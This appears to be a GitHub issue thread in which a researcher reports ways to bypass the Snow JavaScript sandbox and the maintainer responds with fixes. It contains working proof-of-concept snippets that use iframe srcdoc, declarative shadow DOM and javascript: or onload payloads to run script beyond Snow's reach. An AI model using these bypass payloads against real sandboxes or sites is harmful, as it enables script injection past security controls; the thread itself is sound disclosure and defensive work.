Bypass Snow via declarative shadow DOM

[arxenix]

You can create a shadowDOM via <template> tag shadowroot attribute in chrome, this is called the declarative shadow DOM: https://web.dev/declarative-shadow-dom/

Declarative Shadow DOM is processed and attached when the document is loaded, so we use it in an iframe srcdoc.

f = document.createElement('iframe');
// works for both open and closed shadowroot
f.srcdoc = `
<my-element>
<template id="x" shadowroot="closed">
<b>In Template & ShadowDOM</b>
<iframe src="javascript:alert(document.domain)"></iframe>
</template>
</my-element>
`;
document.body.appendChild(f);

[arxenix]

Turns out that you don't need a shadow DOM at all for this. Simply:

f = document.createElement('iframe');
f.srcdoc = '<iframe src="javascript:alert(document.domain)"></iframe>';
document.body.appendChild(f);

declarative shadow DOM might be a separate issue though, because you can still use it to prevent snow from stripping onload attributes (#32 ):

f = document.createElement('iframe');
// works for both open and closed shadowroot
f.srcdoc = `
<my-element>
<template id="x" shadowroot="closed">
<b>In Template & ShadowDOM</b>
<iframe onload="this.contentWindow.alert.call(top, top.origin)"></iframe>
</template>
</my-element>
`;
document.body.appendChild(f);

[weizman]

Awesome catch, I honestly have never heard of declarative shadow DOMs before this. For now the solution would be to block declarative shadow DOMs when are injected this way, visit #46 to learn more about this decision.

Regarding your other catch which doesn't involve declarative shadow DOMs at all (which is unrelated to this issue), #48 should fix this.

[weizman]

if disallowing usage of declarative shadow DOMs the way Snow does (https://github.com/LavaMoat/snow/issues/44#issuecomment-1369686014) prevents your application from running correctly, please share so in this issue thread so we can discuss the problem and understand how to best deal with it